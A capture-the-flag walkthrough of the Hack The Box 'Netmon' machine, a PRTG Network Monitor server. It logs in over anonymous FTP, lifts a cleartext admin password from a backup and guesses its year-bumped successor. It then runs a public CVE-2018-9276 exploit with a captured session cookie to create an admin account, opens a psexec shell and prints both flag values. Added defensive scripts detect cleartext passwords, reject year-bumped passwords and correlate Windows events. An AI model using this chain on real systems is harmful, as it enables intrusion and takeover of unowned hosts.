# Netmon - Easy

![Netmon](/files/ws2VqKqsjFxGvZDmPM5w)

## Introduction@Netmon:~$

| Name         | [Netmon](https://app.hackthebox.com/machines/Netmon) |
| ------------ | ---------------------------------------------------- |
| IP           | 10.10.10.152                                         |
| OS           | Windows                                              |
| Points       | 20                                                   |
| Difficulty   | Easy                                                 |
| Creator      | [mrb3n](https://app.hackthebox.com/users/2984)       |
| Release Date | 02 March 2019                                        |

## Enumeration

### Nmap

```
# Nmap 7.92 scan initiated Thu Dec 23 15:58:37 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.152
Nmap scan report for netmon.htb (10.10.10.152)
Host is up (0.35s latency).
Not shown: 995 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-server-header: PRTG/18.1.37.13946
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-12-23T09:37:47
|_  start_date: 2021-12-23T09:36:30
|_clock-skew: mean: 8m49s, deviation: 0s, median: 8m49s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 23 15:59:03 2021 -- 1 IP address (1 host up) scanned in 26.48 seconds
```

`FTP` allows `anonymous` login:

```
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:sheinn101): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
12-23-21  05:20AM       <DIR>          Windows
226 Transfer complete.
ftp>
```

It seems the FTP root directory is `C:\`.

### Getting User.txt

```
ftp> cd users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  10:44PM       <DIR>          Administrator
12-23-21  05:13AM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
12-23-21  05:18AM                   94 tester.txt
12-23-21  04:37AM                   34 user.txt
07-16-16  08:18AM       <DIR>          Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
34 bytes received in 0.33 secs (0.0999 kB/s)
ftp> exit
221 Goodbye.
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ cat user.txt 
f876bb779c4439a08f27e9b0404e6fb5
```

The user flag can be read directly over anonymous FTP.

### Web

![](/files/0LDsKgtWVyHjXF98P9Kz)

This is the `PRTG Network Monitor (NETMON)` login page, so the first thing to try is the default credentials, `prtgadmin:prtgadmin`. They don't work here, so we need to look for credentials through the `FTP` access.

After poking around, we find the `PRTG Network Monitor` configuration files in `\ProgramData\Paessler\PRTG Network Monitor`.

```
ftp> cd "\ProgramData\Paessler\PRTG Network Monitor"
250 CWD command successful.
ftp> ls -al
200 PORT command successful.
150 Opening ASCII mode data connection.
12-15-21  07:23AM       <DIR>          Configuration Auto-Backups
12-23-21  04:36AM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
12-23-21  04:36AM       <DIR>          Logs (Web Server)
12-23-21  04:42AM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
12-23-21  05:18AM              1671248 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get "PRTG Configuration.old.bak"
```

![](/files/U9shcZLUd3cNgFEn6QNu)

```xml
<dbpassword>
	<!-- User: prtgadmin -->
	PrTg@dmin2018
</dbpassword>
```
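The finding above, turned into an audit check, as an added example (not part of the original write-up): a scan of configuration text for password elements that hold a bare value. It assumes encrypted values are stored as child elements; the sample input is constructed, and the `proxypassword` and `snmppassword` element names are hypothetical.

```python
import re

# Matches any element whose tag name contains "password", e.g. <dbpassword>.
PASSWORD_ELEMENT = re.compile(
    r"<(?P<tag>\w*password\w*)>(?P<body>.*?)</(?P=tag)>",
    re.IGNORECASE | re.DOTALL,
)
XML_COMMENT = re.compile(r"<!--.*?-->", re.DOTALL)


def find_cleartext_passwords(config_text):
    """Return (tag, line_number) for password elements that hold bare text.

    Elements that are empty or contain child elements (assumed here to be
    the encrypted form) are ignored. Values are deliberately not returned,
    so the report does not become another copy of the secret.
    """
    findings = []
    for match in PASSWORD_ELEMENT.finditer(config_text):
        body = XML_COMMENT.sub("", match.group("body")).strip()
        if body and "<" not in body:
            line_number = config_text.count("\n", 0, match.start()) + 1
            findings.append((match.group("tag"), line_number))
    return findings


# Constructed sample: the first element mirrors the snippet on this page,
# the other two are hypothetical stand-ins for encrypted and empty values.
SAMPLE_CONFIG = """<root>
  <dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
  </dbpassword>
  <proxypassword>
    <flags><encrypted/></flags>
    <cell>QUJDREVGR0g=</cell>
  </proxypassword>
  <snmppassword></snmppassword>
</root>
"""

if __name__ == "__main__":
    for tag, line in find_cleartext_passwords(SAMPLE_CONFIG):
        print(f"cleartext value in <{tag}> at line {line}")
```

Run over every `.dat`, `.old` and `.bak` copy in the data directory, a check like this shows which stale backups still need to be removed or locked down.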

Let's try these credentials on the login page.

![](/files/gcbPDtLtCjDUqqJBH02m)

That doesn't work either. Look at the structure of the password, `PrTg@dmin2018`: it ends in `2018`, and the file it came from is an old backup. So we should change the year in the password. I tried `PrTg@dmin2019` and it worked.
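The year bump above is exactly what a password-change check should refuse. A sketch of such a check, as an added example that is not part of the original write-up; the function names and the `min_distance=3` threshold are assumptions.

```python
import re

DIGIT_RUN = re.compile(r"\d+")


def skeleton(password):
    """Collapse digit runs to '#' and fold case: 'PrTg@dmin2018' -> 'prtg@dmin#'."""
    return DIGIT_RUN.sub("#", password).casefold()


def edit_distance(a, b):
    """Levenshtein distance, computed row by row."""
    previous = list(range(len(b) + 1))
    for i, char_a in enumerate(a, start=1):
        current = [i]
        for j, char_b in enumerate(b, start=1):
            current.append(min(
                previous[j] + 1,                       # delete char_a
                current[j - 1] + 1,                    # insert char_b
                previous[j - 1] + (char_a != char_b),  # substitute
            ))
        previous = current
    return previous[-1]


def rotation_problems(current, new, min_distance=3):
    """Return the reasons a password change should be rejected (empty if none).

    `current` is available in cleartext at change time because the user has
    to supply it; stored hashes alone cannot support this comparison.
    """
    problems = []
    if new == current:
        problems.append("unchanged")
    elif skeleton(new) == skeleton(current):
        problems.append("only digits or letter case changed")
    elif edit_distance(current, new) < min_distance:
        problems.append("fewer than %d character edits" % min_distance)
    return problems


if __name__ == "__main__":
    print(rotation_problems("PrTg@dmin2018", "PrTg@dmin2019"))
```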

![](/files/KVxsAHSw2sh45C0iVhmS)

## Getting Administrator

The PRTG version is shown at the bottom left of the page, so the next step is to search for an exploit for that version.

![](/files/GjwHCYevS2bIL4grKZoi)

We will use this [exploitdb](https://www.exploit-db.com/exploits/46527) bash script.

> <https://www.exploit-db.com/exploits/46527>

Running the script as downloaded may fail with an error like this:

```
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ./46527.sh 
-bash: ./46527.sh: /bin/bash^M: bad interpreter: No such file or directory
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$
```

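The `^M` in the error is a carriage return: the script was saved with Windows (CRLF) line endings, so the interpreter path on the first line is not found. Strip the carriage returns to fix it:

```bash
sed -i -e 's/\r$//' 46527.sh
```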

```
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ./46527.sh 

[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution                [*] 
[+]#########################################################################[+] 
[*] Date: 11/03/2019                                                        [*] 
[+]#########################################################################[+] 
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] 
[+]#########################################################################[+] 
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*] 
[*] Version: 18.2.38                                                        [*] 
[*] CVE: CVE-2018-9276                                                      [*] 
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*] 
[+]#########################################################################[+] 

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' 

[+]#########################################################################[+] 
 EXAMPLE USAGE: ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"
```

The script needs the session `cookie` of the logged-in user, which we can grab with Burp.

![](/files/pTRnYSubWpFAUWVs0qdd)

```bash
./46527.sh -u http://10.10.10.152 -c "_ga=GA1.2.2019227520.1640252936; _gid=GA1.2.125523594.1640252936; OCTOPUS1813713946=e0RGRUJCNzI0LTBDMzYtNDk5Q04QzIzLUY3ODVEODJFQjJDNX0%3D"
```

![](/files/zS28VghirEQ8eXXLUppu)

The script has created a new user with the credentials `pentest:P3nT3st!`. Log in with `psexec.py`:

```
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/psexec.py pentest:"P3nT3st!"@10.10.10.152
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file xHANHcvF.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service KSTQ on 10.10.10.152.....
[*] Starting service KSTQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 0EF5-E5E5

 Directory of c:\Users\Administrator\Desktop

02/02/2019  11:35 PM    <DIR>          .
02/02/2019  11:35 PM    <DIR>          ..
12/23/2021  04:37 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,758,518,784 bytes free

c:\Users\Administrator\Desktop>type root.txt
52a75d9617892bb0d16e610dbf2e8787
```
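Seen from the defender's side, the last two steps leave a recognisable trail: a new account (event 4720), its addition to the local Administrators group (4732), then a service install (7045). The correlation below is an added example, not part of the original write-up; the event records are constructed and flattened to plain dictionaries, and the 30-minute window is an assumption.

```python
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators


def correlate(events, window=timedelta(minutes=30)):
    """Flag accounts that are created, added to Administrators and then
    followed by a service install, each step within `window` of the last."""
    created, promoted, alerts = {}, {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 4720:    # Security log: a user account was created
            created[ev["TargetSid"]] = (ev["TargetUserName"], ev["time"])
        elif ev["id"] == 4732 and ev["TargetSid"] == ADMINISTRATORS_SID:
            sid = ev["MemberSid"]  # Security log: member added to local group
            if sid in created and ev["time"] - created[sid][1] <= window:
                promoted[sid] = ev["time"]
        elif ev["id"] == 7045:  # System log: a service was installed
            for sid, when in promoted.items():
                if ev["time"] - when <= window:
                    alerts.append({"account": created[sid][0],
                                   "service": ev["ServiceName"],
                                   "image": ev["ImagePath"]})
    return alerts


# Constructed events. The account, service and file names are the ones shown
# in this write-up; the SIDs, times and the other two entries are made up.
T0 = datetime(2021, 12, 23, 5, 10)
NEW_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
SAMPLE_EVENTS = [
    {"id": 7045, "time": T0 - timedelta(hours=2),
     "ServiceName": "ExampleUpdater", "ImagePath": r"C:\Program Files\Example\upd.exe"},
    {"id": 4720, "time": T0 - timedelta(hours=1),
     "TargetSid": NEW_SID[:-4] + "1002", "TargetUserName": "helpdesk"},
    {"id": 4720, "time": T0, "TargetSid": NEW_SID, "TargetUserName": "pentest"},
    {"id": 4732, "time": T0 + timedelta(seconds=1),
     "TargetSid": ADMINISTRATORS_SID, "MemberSid": NEW_SID},
    {"id": 7045, "time": T0 + timedelta(minutes=4),
     "ServiceName": "KSTQ", "ImagePath": r"%systemroot%\xHANHcvF.exe"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print("new local admin followed by service install:", alert)
```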

![](/files/UMswqkJjkI4wMFflqvdz)

> <https://app.hackthebox.com/profile/237587>

## Resources

> <https://www.exploit-db.com/exploits/46527>
>
> <https://www.codewatch.org/blog/?p=453>


